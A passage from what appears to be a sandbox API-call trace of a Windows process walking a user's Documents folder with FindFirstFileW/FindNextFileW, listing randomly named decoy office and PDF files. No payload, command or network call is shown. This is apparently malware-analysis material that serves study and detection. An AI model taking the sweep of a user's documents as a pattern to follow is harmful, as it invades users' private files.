ftLastWriteTime.dwHighDateTime=0x1d57608, nFileSizeHigh=0x0, nFileSizeLow=0x122e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="nxK5u36q93ybBp9Qf.pptx", cAlternateFileName="NXK5U3~1.PPT")) returned 1 [0151.427] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1045a0, ftCreationTime.dwHighDateTime=0x1d5d784, ftLastAccessTime.dwLowDateTime=0x4d9e1930, ftLastAccessTime.dwHighDateTime=0x1d5b76e, ftLastWriteTime.dwLowDateTime=0x4d9e1930, ftLastWriteTime.dwHighDateTime=0x1d5b76e, nFileSizeHigh=0x0, nFileSizeLow=0x1133c, dwReserved0=0x0, dwReserved1=0x0, cFileName="O02lgMZZQSqmUq.pptx", cAlternateFileName="O02LGM~1.PPT")) returned 1 [0151.427] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1745ced0, ftCreationTime.dwHighDateTime=0x1d57d0f, ftLastAccessTime.dwLowDateTime=0xea813c30, ftLastAccessTime.dwHighDateTime=0x1d5e5bf, ftLastWriteTime.dwLowDateTime=0xea813c30, ftLastWriteTime.dwHighDateTime=0x1d5e5bf, nFileSizeHigh=0x0, nFileSizeLow=0x44fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="OPMjP99y.xlsx", cAlternateFileName="OPMJP9~1.XLS")) returned 1 [0151.428] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0151.428] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f587d40, ftCreationTime.dwHighDateTime=0x1d5d81e, ftLastAccessTime.dwLowDateTime=0x236d0bf0, ftLastAccessTime.dwHighDateTime=0x1d5dac1, ftLastWriteTime.dwLowDateTime=0x236d0bf0, ftLastWriteTime.dwHighDateTime=0x1d5dac1, nFileSizeHigh=0x0, nFileSizeLow=0x704c, dwReserved0=0x0, dwReserved1=0x0, cFileName="qA2 POjX.pptx", cAlternateFileName="QA2POJ~1.PPT")) returned 1 [0151.428] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a93e8f0, ftCreationTime.dwHighDateTime=0x1d5dfc2, ftLastAccessTime.dwLowDateTime=0x63227650, ftLastAccessTime.dwHighDateTime=0x1d5e0ab, ftLastWriteTime.dwLowDateTime=0x63227650, ftLastWriteTime.dwHighDateTime=0x1d5e0ab, nFileSizeHigh=0x0, nFileSizeLow=0x1d84, dwReserved0=0x0, dwReserved1=0x0, cFileName="QnhpLmLhHkmJWB.xlsx", cAlternateFileName="QNHPLM~1.XLS")) returned 1 [0151.428] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71e37940, ftCreationTime.dwHighDateTime=0x1d565a5, ftLastAccessTime.dwLowDateTime=0x57392da0, ftLastAccessTime.dwHighDateTime=0x1d5b08d, ftLastWriteTime.dwLowDateTime=0x57392da0, ftLastWriteTime.dwHighDateTime=0x1d5b08d, nFileSizeHigh=0x0, nFileSizeLow=0xa216, dwReserved0=0x0, dwReserved1=0x0, cFileName="U6is7p61GHkLJ3_.docx", cAlternateFileName="U6IS7P~1.DOC")) returned 1 [0151.428] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x630d78c0, ftCreationTime.dwHighDateTime=0x1d59fb2, ftLastAccessTime.dwLowDateTime=0xcc72acf0, ftLastAccessTime.dwHighDateTime=0x1d572a7, ftLastWriteTime.dwLowDateTime=0xcc72acf0, ftLastWriteTime.dwHighDateTime=0x1d572a7, nFileSizeHigh=0x0, nFileSizeLow=0x12921, dwReserved0=0x0, dwReserved1=0x0, cFileName="vjiQ_cpSzI_lE09.docx", cAlternateFileName="VJIQ_C~1.DOC")) returned 1 [0151.428] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a0ac50, ftCreationTime.dwHighDateTime=0x1d5bbf6, ftLastAccessTime.dwLowDateTime=0x667b4790, ftLastAccessTime.dwHighDateTime=0x1d58be3, ftLastWriteTime.dwLowDateTime=0x667b4790, ftLastWriteTime.dwHighDateTime=0x1d58be3, nFileSizeHigh=0x0, nFileSizeLow=0x160fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="VzbTJtSh2.xlsx", cAlternateFileName="VZBTJT~1.XLS")) returned 1 [0151.428] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x651eff10, ftCreationTime.dwHighDateTime=0x1d5e58c, ftLastAccessTime.dwLowDateTime=0x96b16bc0, ftLastAccessTime.dwHighDateTime=0x1d5e489, ftLastWriteTime.dwLowDateTime=0x96b16bc0, ftLastWriteTime.dwHighDateTime=0x1d5e489, nFileSizeHigh=0x0, nFileSizeLow=0x18b4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="wkIoRTbVM.docx", cAlternateFileName="WKIORT~1.DOC")) returned 1 [0151.429] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69c17d40, ftCreationTime.dwHighDateTime=0x1d5e127, ftLastAccessTime.dwLowDateTime=0xd081d6c0, ftLastAccessTime.dwHighDateTime=0x1d5e78e, ftLastWriteTime.dwLowDateTime=0xd081d6c0, ftLastWriteTime.dwHighDateTime=0x1d5e78e, nFileSizeHigh=0x0, nFileSizeLow=0xa694, dwReserved0=0x0, dwReserved1=0x0, cFileName="X5Fh3VEi-d94zoqNP.pptx", cAlternateFileName="X5FH3V~1.PPT")) returned 1 [0151.429] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa389e780, ftCreationTime.dwHighDateTime=0x1d5dc61, ftLastAccessTime.dwLowDateTime=0xc6cbf380, ftLastAccessTime.dwHighDateTime=0x1d5da88, ftLastWriteTime.dwLowDateTime=0xc6cbf380, ftLastWriteTime.dwHighDateTime=0x1d5da88, nFileSizeHigh=0x0, nFileSizeLow=0x1233, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZxmGTONw7B.doc", cAlternateFileName="ZXMGTO~1.DOC")) returned 1 [0151.429] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.429] FindClose (in: hFindFile=0x777e58 | out: hFindFile=0x777e58) returned 1 [0151.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee8b8) returned 1 [0151.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee8c4) returned 1 [0151.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8f8) returned 1 [0151.429] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0151.429] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", nBufferLength=0x105, lpBuffer=0x2ee3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpFilePart=0x0) returned 0x28 [0151.429] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x2ee620 | out: lpFindFileData=0x2ee620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaf72c80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaf72c80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x777e58 [0151.430] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaf72c80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaf72c80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.430] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa3d23d0, ftCreationTime.dwHighDateTime=0x1d58c7a, ftLastAccessTime.dwLowDateTime=0x1f872b00, ftLastAccessTime.dwHighDateTime=0x1d5a1f1, ftLastWriteTime.dwLowDateTime=0x1f872b00, ftLastWriteTime.dwHighDateTime=0x1d5a1f1, nFileSizeHigh=0x0, nFileSizeLow=0x2d01, dwReserved0=0x0, dwReserved1=0x0, cFileName="-60II61Ak.xlsx", cAlternateFileName="-60II6~1.XLS")) returned 1 [0151.430] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fd76690, ftCreationTime.dwHighDateTime=0x1d5d008, ftLastAccessTime.dwLowDateTime=0x456122f0, ftLastAccessTime.dwHighDateTime=0x1d55e0c, ftLastWriteTime.dwLowDateTime=0x456122f0, ftLastWriteTime.dwHighDateTime=0x1d55e0c, nFileSizeHigh=0x0, nFileSizeLow=0xbc5f, dwReserved0=0x0, dwReserved1=0x0, cFileName="3JvcF.xlsx", cAlternateFileName="3JVCF~1.XLS")) returned 1 [0151.430] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcbec050, ftCreationTime.dwHighDateTime=0x1d5e18b, ftLastAccessTime.dwLowDateTime=0x685d6430, ftLastAccessTime.dwHighDateTime=0x1d5e7dc, ftLastWriteTime.dwLowDateTime=0x685d6430, ftLastWriteTime.dwHighDateTime=0x1d5e7dc, nFileSizeHigh=0x0, nFileSizeLow=0x12aa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="6OpWlEN8bGay.pps", cAlternateFileName="6OPWLE~1.PPS")) returned 1 [0151.430] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x719de1a0, ftCreationTime.dwHighDateTime=0x1d5d049, ftLastAccessTime.dwLowDateTime=0xcc966530, ftLastAccessTime.dwHighDateTime=0x1d5b1ab, ftLastWriteTime.dwLowDateTime=0xcc966530, ftLastWriteTime.dwHighDateTime=0x1d5b1ab, nFileSizeHigh=0x0, nFileSizeLow=0x3903, dwReserved0=0x0, dwReserved1=0x0, cFileName="8WUYgnmVVQsOHl.pptx", cAlternateFileName="8WUYGN~1.PPT")) returned 1 [0151.430] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x767d9620, ftCreationTime.dwHighDateTime=0x1d5695b, ftLastAccessTime.dwLowDateTime=0xd6a1ad90, ftLastAccessTime.dwHighDateTime=0x1d5c2a5, ftLastWriteTime.dwLowDateTime=0xd6a1ad90, ftLastWriteTime.dwHighDateTime=0x1d5c2a5, nFileSizeHigh=0x0, nFileSizeLow=0xd9da, dwReserved0=0x0, dwReserved1=0x0, cFileName="9BNDTe04t.docx", cAlternateFileName="9BNDTE~1.DOC")) returned 1 [0151.431] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb814a740, ftCreationTime.dwHighDateTime=0x1d5cc57, ftLastAccessTime.dwLowDateTime=0x355e24e0, ftLastAccessTime.dwHighDateTime=0x1d57ab1, ftLastWriteTime.dwLowDateTime=0x355e24e0, ftLastWriteTime.dwHighDateTime=0x1d57ab1, nFileSizeHigh=0x0, nFileSizeLow=0x19d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="9sF-lI.xlsx", cAlternateFileName="9SF-LI~1.XLS")) returned 1 [0151.431] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x416765b0, ftCreationTime.dwHighDateTime=0x1d5e156, ftLastAccessTime.dwLowDateTime=0x65a90080, ftLastAccessTime.dwHighDateTime=0x1d5d960, ftLastWriteTime.dwLowDateTime=0x65a90080, ftLastWriteTime.dwHighDateTime=0x1d5d960, nFileSizeHigh=0x0, nFileSizeLow=0x11ec5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ar_xRF-J11M00dg.ots", cAlternateFileName="AR_XRF~1.OTS")) returned 1 [0151.431] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bbbf5c0, ftCreationTime.dwHighDateTime=0x1d5e6e9, ftLastAccessTime.dwLowDateTime=0x6418b050, ftLastAccessTime.dwHighDateTime=0x1d5e705, ftLastWriteTime.dwLowDateTime=0x6418b050, ftLastWriteTime.dwHighDateTime=0x1d5e705, nFileSizeHigh=0x0, nFileSizeLow=0xb03, dwReserved0=0x0, dwReserved1=0x0, cFileName="b3zzTQNH7.ods", cAlternateFileName="B3ZZTQ~1.ODS")) returned 1 [0151.432] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8f4aa70, ftCreationTime.dwHighDateTime=0x1d5e44d, ftLastAccessTime.dwLowDateTime=0x26f80310, ftLastAccessTime.dwHighDateTime=0x1d5e1f6, ftLastWriteTime.dwLowDateTime=0x26f80310, ftLastWriteTime.dwHighDateTime=0x1d5e1f6, nFileSizeHigh=0x0, nFileSizeLow=0x1974, dwReserved0=0x0, dwReserved1=0x0, cFileName="CjUJmtsyr.odt", cAlternateFileName="CJUJMT~1.ODT")) returned 1 [0151.432] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc9239a0, ftCreationTime.dwHighDateTime=0x1d5e668, ftLastAccessTime.dwLowDateTime=0x58812d0, ftLastAccessTime.dwHighDateTime=0x1d5e69f, ftLastWriteTime.dwLowDateTime=0x58812d0, ftLastWriteTime.dwHighDateTime=0x1d5e69f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DDkKzEBB5Hx30VX7FT", cAlternateFileName="DDKKZE~1")) returned 1 [0151.432] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0151.432] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb81a750, ftCreationTime.dwHighDateTime=0x1d5dc6d, ftLastAccessTime.dwLowDateTime=0x77fc4040, ftLastAccessTime.dwHighDateTime=0x1d57d7a, ftLastWriteTime.dwLowDateTime=0x77fc4040, ftLastWriteTime.dwHighDateTime=0x1d57d7a, nFileSizeHigh=0x0, nFileSizeLow=0x118f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ecol784pYTNNS.docx", cAlternateFileName="ECOL78~1.DOC")) returned 1 [0151.432] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b0320, ftCreationTime.dwHighDateTime=0x1d5db09, ftLastAccessTime.dwLowDateTime=0xfda80a0, ftLastAccessTime.dwHighDateTime=0x1d5dfcf, ftLastWriteTime.dwLowDateTime=0xfda80a0, ftLastWriteTime.dwHighDateTime=0x1d5dfcf, nFileSizeHigh=0x0, nFileSizeLow=0x7407, dwReserved0=0x0, dwReserved1=0x0, cFileName="EUeaVFPg9xvOeyoTY.xlsx", cAlternateFileName="EUEAVF~1.XLS")) returned 1 [0151.432] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa180a720, ftCreationTime.dwHighDateTime=0x1d5e4be, ftLastAccessTime.dwLowDateTime=0xccf441f0, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0xccf441f0, ftLastWriteTime.dwHighDateTime=0x1d5e5c7, nFileSizeHigh=0x0, nFileSizeLow=0x1766a, dwReserved0=0x0, dwReserved1=0x0, cFileName="gke7Hh05Yah.pdf", cAlternateFileName="GKE7HH~1.PDF")) returned 1 [0151.432] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c949040, ftCreationTime.dwHighDateTime=0x1d5e0fb, ftLastAccessTime.dwLowDateTime=0x69bbdae0, ftLastAccessTime.dwHighDateTime=0x1d5df59, ftLastWriteTime.dwLowDateTime=0x69bbdae0, ftLastWriteTime.dwHighDateTime=0x1d5df59, nFileSizeHigh=0x0, nFileSizeLow=0x60a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="GQnlDqiYaM01tswsYqy.pdf", cAlternateFileName="GQNLDQ~1.PDF")) returned 1 [0151.433] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbbab7d0, ftCreationTime.dwHighDateTime=0x1d5d857, ftLastAccessTime.dwLowDateTime=0x319e110, ftLastAccessTime.dwHighDateTime=0x1d5d83d, ftLastWriteTime.dwLowDateTime=0x319e110, ftLastWriteTime.dwHighDateTime=0x1d5d83d, nFileSizeHigh=0x0, nFileSizeLow=0x149a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="I9b4Uj.doc", cAlternateFileName="")) returned 1 [0151.433] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3789e7e0, ftCreationTime.dwHighDateTime=0x1d597e4, ftLastAccessTime.dwLowDateTime=0x9b276270, ftLastAccessTime.dwHighDateTime=0x1d5a5de, ftLastWriteTime.dwLowDateTime=0x9b276270, ftLastWriteTime.dwHighDateTime=0x1d5a5de, nFileSizeHigh=0x0, nFileSizeLow=0x6582, dwReserved0=0x0, dwReserved1=0x0, cFileName="KWnLqD jTsie6.docx", cAlternateFileName="KWNLQD~1.DOC")) returned 1 [0151.433] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b6c3b0, ftCreationTime.dwHighDateTime=0x1d55cf8, ftLastAccessTime.dwLowDateTime=0xb144db60, ftLastAccessTime.dwHighDateTime=0x1d59c0f, ftLastWriteTime.dwLowDateTime=0xb144db60, ftLastWriteTime.dwHighDateTime=0x1d59c0f, nFileSizeHigh=0x0, nFileSizeLow=0xd9f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="mjKxv.pptx", cAlternateFileName="MJKXV~1.PPT")) returned 1 [0151.433] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0151.433] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0151.433] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0151.433] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0151.434] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d2692b0, ftCreationTime.dwHighDateTime=0x1d5dc22, ftLastAccessTime.dwLowDateTime=0xb246da30, ftLastAccessTime.dwHighDateTime=0x1d5e41d, ftLastWriteTime.dwLowDateTime=0xb246da30, ftLastWriteTime.dwHighDateTime=0x1d5e41d, nFileSizeHigh=0x0, nFileSizeLow=0x116b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="ndCXgWoaW3O_s9.doc", cAlternateFileName="NDCXGW~1.DOC")) returned 1 [0151.434] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca82830, ftCreationTime.dwHighDateTime=0x1d5d995, ftLastAccessTime.dwLowDateTime=0x8df1c010, ftLastAccessTime.dwHighDateTime=0x1d5e0de, ftLastWriteTime.dwLowDateTime=0x8df1c010, ftLastWriteTime.dwHighDateTime=0x1d5e0de, nFileSizeHigh=0x0, nFileSizeLow=0x691d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Nhxbjjn.pptx", cAlternateFileName="NHXBJJ~1.PPT")) returned 1 [0151.434] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81b50e70, ftCreationTime.dwHighDateTime=0x1d55c85, ftLastAccessTime.dwLowDateTime=0x15a3a600, ftLastAccessTime.dwHighDateTime=0x1d57608, ftLastWriteTime.dwLowDateTime=0x15a3a600, ftLastWriteTime.dwHighDateTime=0x1d57608, nFileSizeHigh=0x0, nFileSizeLow=0x122e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="nxK5u36q93ybBp9Qf.pptx", cAlternateFileName="NXK5U3~1.PPT")) returned 1 [0151.434] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1045a0, ftCreationTime.dwHighDateTime=0x1d5d784, ftLastAccessTime.dwLowDateTime=0x4d9e1930, ftLastAccessTime.dwHighDateTime=0x1d5b76e, ftLastWriteTime.dwLowDateTime=0x4d9e1930, ftLastWriteTime.dwHighDateTime=0x1d5b76e, nFileSizeHigh=0x0, nFileSizeLow=0x1133c, dwReserved0=0x0, dwReserved1=0x0, cFileName="O02lgMZZQSqmUq.pptx", cAlternateFileName="O02LGM~1.PPT")) returned 1 [0151.434] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1745ced0, ftCreationTime.dwHighDateTime=0x1d57d0f, ftLastAccessTime.dwLowDateTime=0xea813c30, ftLastAccessTime.dwHighDateTime=0x1d5e5bf, ftLastWriteTime.dwLowDateTime=0xea813c30, ftLastWriteTime.dwHighDateTime=0x1d5e5bf, nFileSizeHigh=0x0, nFileSizeLow=0x44fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="OPMjP99y.xlsx", cAlternateFileName="OPMJP9~1.XLS")) returned 1 [0151.434] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0151.435] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f587d40, ftCreationTime.dwHighDateTime=0x1d5d81e, ftLastAccessTime.dwLowDateTime=0x236d0bf0, ftLastAccessTime.dwHighDateTime=0x1d5dac1, ftLastWriteTime.dwLowDateTime=0x236d0bf0, ftLastWriteTime.dwHighDateTime=0x1d5dac1, nFileSizeHigh=0x0, nFileSizeLow=0x704c, dwReserved0=0x0, dwReserved1=0x0, cFileName="qA2 POjX.pptx", cAlternateFileName="QA2POJ~1.PPT")) returned 1 [0151.435] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a93e8f0, ftCreationTime.dwHighDateTime=0x1d5dfc2, 